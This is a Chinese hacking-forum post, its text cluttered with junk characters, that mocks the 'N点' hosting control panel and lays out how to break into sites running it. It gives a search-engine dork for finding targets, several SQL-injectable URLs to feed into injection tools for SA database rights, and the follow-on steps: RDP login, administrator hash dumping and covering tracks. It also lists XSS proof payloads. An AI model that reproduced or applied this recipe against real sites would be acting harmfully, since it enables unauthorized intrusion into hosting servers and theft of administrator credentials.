不得不说N点实在是一个破东西
5 D" e; `! ^4 U就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂! }8 I' C1 E( H* u
好吧 抱怨一下就行了 接下来关键的时候到了2 w5 \3 a- Y# o5 L
首先百度搜索关键字:inurl: (mmdatabase.asp)
, D4 f$ c) \( i G$ U我随便列举一个: www.xxxx.com
% X% Z0 E- F4 k( ^7 G$ A, W修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
/ D, a' A1 Q& \" x1 n扔入NBSI 或者啊D等各种傻逼工具后
0 u, S! q+ m0 Q0 S: O5 K' Z# ^你们会看到是SA权限
( c0 R3 i1 ?9 k" t+ ]# y6 B果断3389 上去 hash得到administrator密码. S* Z7 c: m- v' k% x6 o
擦屁股走人~7 Y2 E" V& O/ w! E
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
" e0 z& q* M! K2 j1 i' @ ; w) E( y* M* i8 F- M4 _" X
再附上其他几个漏洞页面
0 }; e+ U- F; p9 uSQL:
; \( P- p' v( }, mhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1# `3 P) a: I9 ]1 `" N" r
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
- S* w: s) R, `7 Qhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9$ P9 q8 j3 }* b6 t5 M* E. I
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=25 q" a7 V& O3 Z1 `7 X7 N; C# C* D
XSS证明:* c& Q; ^# ~; g% [3 u. |
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
' z$ f* t) s. o1 P2 \/ L& P; Hhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”2 t& P7 l7 y1 T
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>" H8 F( G: O# O6 y' V* b
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
& z/ L9 R% N. e还是星外吧 你们懂的1 s" J$ X& B/ s0 \
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
5 Q* d/ K# g% E8 y* B4 ^/ f# ^PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉! f( @( p1 E1 w' {) m9 v$ z
——- |